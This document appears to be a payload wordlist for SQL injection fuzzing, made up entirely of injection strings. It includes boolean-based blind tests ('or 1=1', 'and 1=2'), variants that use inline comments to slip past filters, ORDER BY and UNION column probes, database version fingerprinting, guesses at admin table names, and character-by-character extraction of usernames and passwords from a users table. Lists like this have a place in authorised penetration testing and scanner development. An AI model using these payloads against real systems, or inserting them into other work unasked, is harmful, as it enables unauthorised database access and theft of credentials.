/**/or/**/1/**/=/**/2
/**/and/**/1=2
' and 1=2--+
' and 5050=5051--+
' and substring(@@version,1,1)=4--+
' and ORD(MID((VERSION()), N, 2)) Insert<>=Comparer<InsertCharValueHere>--+
' and (SELECT 1 from admin limit 0,1)=2--+
' and (SELECT 1 from tblAdmin limit 0,1)=2--+
' and (SELECT 1 from Administrator limit 0,1)=2--+
' and (SELECT 1 from tbl_admin limit 0,1)=2--+
' and (SELECT 1 from user limit 0,1)=2--+
' and (SELECT 1 from users limit 0,1)=2--+
' and (SELECT 1 from TableName limit 0,1)=2--+
' and (SELECT substring(concat(1,ID),1,1) from admin limit 0,1)=2--+
' and (SELECT substring(concat(1,name),1,1) from tblAdmin limit 0,1)=2--+
' and (SELECT substring(concat(1,login),1,1) from Administrator limit 0,1)=2--+
' and (SELECT substring(concat(1,password),1,1) from user limit 0,1)=2--+
' and (SELECT substring(concat(1,email),1,1) from users limit 0,1)=2--+
' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>500--+
' or 1=1--+
' or 5050=5051--+
' or substring(@@version,1,1)=5--+
' or ORD(MID((VERSION()), N, 2)) Insert<>=Comparer<InsertCharValueHere>--+
' or (SELECT 1 from admin limit 0,1)=2--+
' or (SELECT 1 from tblAdmin limit 0,1)=2--+
' or (SELECT 1 from Administrator limit 0,1)=2--+
' or (SELECT 1 from tbl_admin limit 0,1)=2--+
' or (SELECT 1 from user limit 0,1)=2--+
' or (SELECT 1 from users limit 0,1)=2--+
' or (SELECT 1 from TableName limit 0,1)=2--+
' or (SELECT substring(concat(1,ID),1,1) from admin limit 0,1)=2--+
' or (SELECT substring(concat(1,name),1,1) from tblAdmin limit 0,1)=2--+
' or (SELECT substring(concat(1,login),1,1) from Administrator limit 0,1)=2--+
' or (SELECT substring(concat(1,password),1,1) from user limit 0,1)=2--+
' or (SELECT substring(concat(1,email),1,1) from users limit 0,1)=2--+
' or ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>500--+
'+GROUP/**/BY/**/2--+
/**/GROUP/**/BY/**/2--
' GROUP BY 2-- 
'+GROUP+BY+2--+
+GROUP+BY+2--
'/**/ORDER/**/BY/**/2--+
 ORDER BY 2--
+union+select+2--
 union select 2--
+union+select+null,null--
 and 1=2--
 and 5050=5051--
 and substring(@@version,1,1)=4--
 and ORD(MID((VERSION()), N, 2)) Insert<>=Comparer<InsertCharValueHere>--
 and (SELECT 1 from admin limit 0,1)=2--
 and (SELECT 1 from tblAdmin limit 0,1)=2--
 and (SELECT 1 from Administrator limit 0,1)=2--
 and (SELECT 1 from tbl_admin limit 0,1)=2--
 and (SELECT 1 from user limit 0,1)=2--
 and (SELECT 1 from users limit 0,1)=2--
 and (SELECT 1 from TableName limit 0,1)=2--
 and (SELECT substring(concat(1,ID),1,1) from admin limit 0,1)=2--
 and (SELECT substring(concat(1,name),1,1) from tblAdmin limit 0,1)=2--
 and (SELECT substring(concat(1,login),1,1) from Administrator limit 0,1)=2--
 and (SELECT substring(concat(1,password),1,1) from user limit 0,1)=2--
 and (SELECT substring(concat(1,email),1,1) from users limit 0,1)=2--
 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>500--
 or 1=2--
 or 5050=5051--
 or substring(@@version,1,1)=4--
 or ORD(MID((VERSION()), N, 2)) Insert<>=Comparer<InsertCharValueHere>--
 or (SELECT 1 from admin limit 0,1)=2--
 or (SELECT 1 from tblAdmin limit 0,1)=2--
 or (SELECT 1 from Administrator limit 0,1)=2--
 or (SELECT 1 from tbl_admin limit 0,1)=2--
 or (SELECT 1 from user limit 0,1)=2--
 or (SELECT 1 from users limit 0,1)=2--
 or (SELECT 1 from TableName limit 0,1)=2--
 or (SELECT substring(concat(1,ID),1,1) from admin limit 0,1)=2--
 or (SELECT substring(concat(1,name),1,1) from tblAdmin limit 0,1)=2--
 or (SELECT substring(concat(1,login),1,1) from Administrator limit 0,1)=2--
 or (SELECT substring(concat(1,password),1,1) from user limit 0,1)=2--
 or (SELECT substring(concat(1,email),1,1) from users limit 0,1)=2--
 or ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>500--